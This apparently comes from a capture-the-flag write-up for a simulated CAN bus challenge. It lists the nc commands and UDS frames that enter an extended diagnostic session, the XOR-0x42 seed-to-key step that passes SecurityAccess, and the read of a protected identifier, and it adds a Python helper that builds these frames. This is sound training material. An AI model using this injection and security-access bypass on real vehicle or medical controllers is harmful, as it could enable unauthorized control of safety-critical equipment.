ESPILON-CTF-2026-Writeups/Hardware/CAN_Bus_Implant
2026-03-22 19:18:58 +01:00

CAN Bus Implant — Solution

Overview

The challenge simulates a CAN bus carrying background traffic and UDS (Unified Diagnostic Services) exchanges. The player sniffs the traffic to identify patterns, then injects UDS frames to gain security access and read a protected DID.

Steps

  1. Open two terminals — one for sniffing, one for injection:
# Terminal 1: Sniff
nc <host> 3600

# Terminal 2: Inject
nc <host> 3601
  2. Observe traffic on the sniff port. Note the following patterns:

    • 0x100: Heartbeat (periodic counter)
    • 0x200-0x203: Sensor data (temperature, heart rate)
    • 0x7DF: OBD broadcast diagnostic request
    • 0x7E0/0x7E8: UDS request/response pair (periodic VIN read)
  3. On the inject port, enter extended diagnostic session:

send 7E0 02 10 03 00 00 00 00 00

The sniff port shows a frame from 0x7E8 carrying the positive response 50 03.

  4. Request a security seed:
send 7E0 02 27 01 00 00 00 00 00

The response contains a 4-byte seed: 67 01 XX XX XX XX.

  5. Compute the key by XORing each seed byte with 0x42, then send:
send 7E0 06 27 02 KK KK KK KK 00

Positive response: 67 02.

  6. Read the flag from DID 0xFF01:
send 7E0 03 22 FF 01 00 00 00 00

Response contains the flag.
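
The frames from the steps above can be generated and checked programmatically. The following Python is an added example, not part of the original write-up or the challenge code: it wraps each UDS payload in a padded single frame, validates the seed response (including the standard UDS negative response 7F), and derives the key with the XOR 0x42 rule. The function names are hypothetical, and it assumes the sniffed response data starts with a length byte (06) before 67 01, mirroring the request frames shown above.

```python
# Added example; function names are hypothetical. The "send" syntax, IDs and
# the XOR 0x42 derivation are the write-up's; the leading length byte on the
# sniffed response is an assumption.
XOR_CONST = 0x42   # key derivation constant from step 5
REQ_ID = "7E0"     # tester -> ECU arbitration ID


def single_frame(payload: bytes) -> bytes:
    """Prefix the payload length and zero-pad to 8 data bytes."""
    if not 1 <= len(payload) <= 7:
        raise ValueError("a single frame carries 1..7 payload bytes")
    return bytes([len(payload)]) + payload + bytes(7 - len(payload))


def send_line(payload: bytes) -> str:
    """Format a frame as the inject port's 'send' command."""
    return f"send {REQ_ID} " + " ".join(f"{b:02X}" for b in single_frame(payload))


def parse_response(data_hex: str, request_sid: int) -> bytes:
    """Return the bytes after the positive-response SID, or raise."""
    data = bytes.fromhex(data_hex)
    if not data or not 1 <= data[0] <= 7 or len(data) < 1 + data[0]:
        raise ValueError("not a complete single frame")
    uds = data[1:1 + data[0]]
    if uds[0] == 0x7F and len(uds) >= 3:   # negative response: 7F <SID> <NRC>
        raise PermissionError(f"request 0x{uds[1]:02X} rejected, NRC 0x{uds[2]:02X}")
    if uds[0] != request_sid + 0x40:       # positive response SID = request + 0x40
        raise ValueError("response does not match the request SID")
    return uds[1:]


def key_from_seed_response(data_hex: str) -> bytes:
    """Extract the 4-byte seed from a 67 01 response and XOR it with 0x42."""
    body = parse_response(data_hex, 0x27)
    if len(body) != 5 or body[0] != 0x01:
        raise ValueError("expected sub-function 01 followed by a 4-byte seed")
    return bytes(b ^ XOR_CONST for b in body[1:])


# Constructed sample: data bytes of a 0x7E8 seed response (not from the challenge).
SAMPLE_SEED_FRAME = "06 67 01 DE AD BE EF 00"
if __name__ == "__main__":
    print(send_line(b"\x10\x03"))                      # extended session
    print(send_line(b"\x27\x01"))                      # request seed
    print(send_line(b"\x27\x02" + key_from_seed_response(SAMPLE_SEED_FRAME)))
    print(send_line(b"\x22\xFF\x01"))                  # read DID 0xFF01
```
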

Key Concepts

  • CAN bus: Controller Area Network — no authentication, broadcast medium, used in vehicles and medical equipment
  • UDS (ISO 14229): Diagnostic protocol with services like DiagnosticSessionControl, SecurityAccess, ReadDataByIdentifier
  • SecurityAccess: Challenge-response authentication — ECU sends seed, tester must compute correct key
  • Traffic analysis: Identifying request/response patterns and protocol types from raw bus traffic